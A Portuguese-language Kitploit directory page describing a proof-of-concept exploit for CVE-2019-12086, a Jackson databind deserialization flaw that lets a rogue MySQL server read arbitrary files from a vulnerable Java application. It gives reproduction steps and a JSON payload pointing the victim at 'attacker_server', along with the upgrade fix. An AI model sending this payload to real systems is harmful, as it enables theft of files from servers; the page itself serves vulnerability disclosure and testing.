Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2019-12086-jackson-databind-file-read — Prova de conceito de exploit para CVE-2019-12086: vulnerabilidade de desserialização do Jackson databind que permite leitura arbitrária de arquivos por meio de um servidor MySQL malicioso quando o Default Typing está ativado. | Kitploit
Ferramentas/GitHubGitHub/motoyasu-saburi/cve-2019-12086-jackson-databind-file-read
Análise de VulnerabilidadesAnálise de CódigoExploraçãoExploração de Aplicações WebTestes de Penetração
GitHubmotoyasu-saburi/cve-2019-12086-jackson-databind-file-read

CVE-2019-12086-jackson-databind-file-read

Prova de conceito de exploit para CVE-2019-12086: vulnerabilidade de desserialização do Jackson databind que permite leitura arbitrária de arquivos por meio de um servidor MySQL malicioso quando o Default Typing está ativado.

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
121há 7 anosAinda não revisado

jackson-CVE-2019-12086

Descrição da Vulnerabilidade

Com o Default Typing habilitado e com a versão mysql-connector-java 8.0.15 ou anterior (lançada em 2019.2.1) no classpath, um atacante pode ler arquivos arbitrários enviando dados JSON maliciosos. A biblioteca mysql-connector-java é o mysql JDBC comumente usado para conectar-se a bancos de dados.

Descrição do CVE:

A Polymorphic Typing issue was discovered in FasterXML jackson-databind 2.x before 2.9.9. When Default Typing is enabled (either globally or for a specific property) for an externally exposed JSON endpoint, the service has the mysql-connector-java jar (8.0.14 or earlier) in the classpath, and an attacker can host a crafted MySQL server reachable by the victim, an attacker can send a crafted JSON message that allows them to read arbitrary local files on the server. This occurs because of missing com.mysql.cj.jdbc.admin.MiniAdmin validation.

Análise da Vulnerabilidade

  1. Com o Default Typing habilitado, ao desserializar JSON, o Jackson pode desserializar classes específicas e pode especificar um valor de tipo primitivo como parâmetro para o construtor dessa classe.
  2. O construtor de com.mysql.cj.jdbc.admin.MiniAdmin aceita um valor do tipo String que representa uma jdbcURL. A classe com.mysql.cj.jdbc.admin.MiniAdmin conecta-se ao banco de dados MySQL especificado por essa jdbcURL durante a inicialização.
  3. Nas versões do mysql-connector-java 8.0.15 ou anteriores (lançadas em 2019.2.1), um servidor MySQL malicioso pode ler arquivos locais arbitrários do cliente MySQL, gerando a vulnerabilidade.

Reprodução da Vulnerabilidade

  1. Inicie um servidor MySQL malicioso: https://github.com/allyshka/Rogue-MySql-Server/blob/master/rogue_mysql_server.py

python rogue_mysql_server.py

  1. No mesmo diretório, monitore o mysql.log:

tail -f mysql.log

  1. Envie o seguinte JSON para a aplicação vulnerável:

["com.mysql.cj.jdbc.admin.MiniAdmin","jdbc:mysql://attacker_server:port/foo"]

  1. Quando o Jackson desserializa a string JSON maliciosa, ele se conecta ao servidor MySQL malicioso, e o conteúdo do arquivo lido é gravado no mysql.log do servidor malicioso.
root@kitploit:~
# edit IP & Port at the payload  "./volume/src/main/java/poc/Main.java".
$ docker build . 

Correção da Vulnerabilidade

Atualize o Jackson para a versão 2.9.9 ou superior.

Baixar ferramenta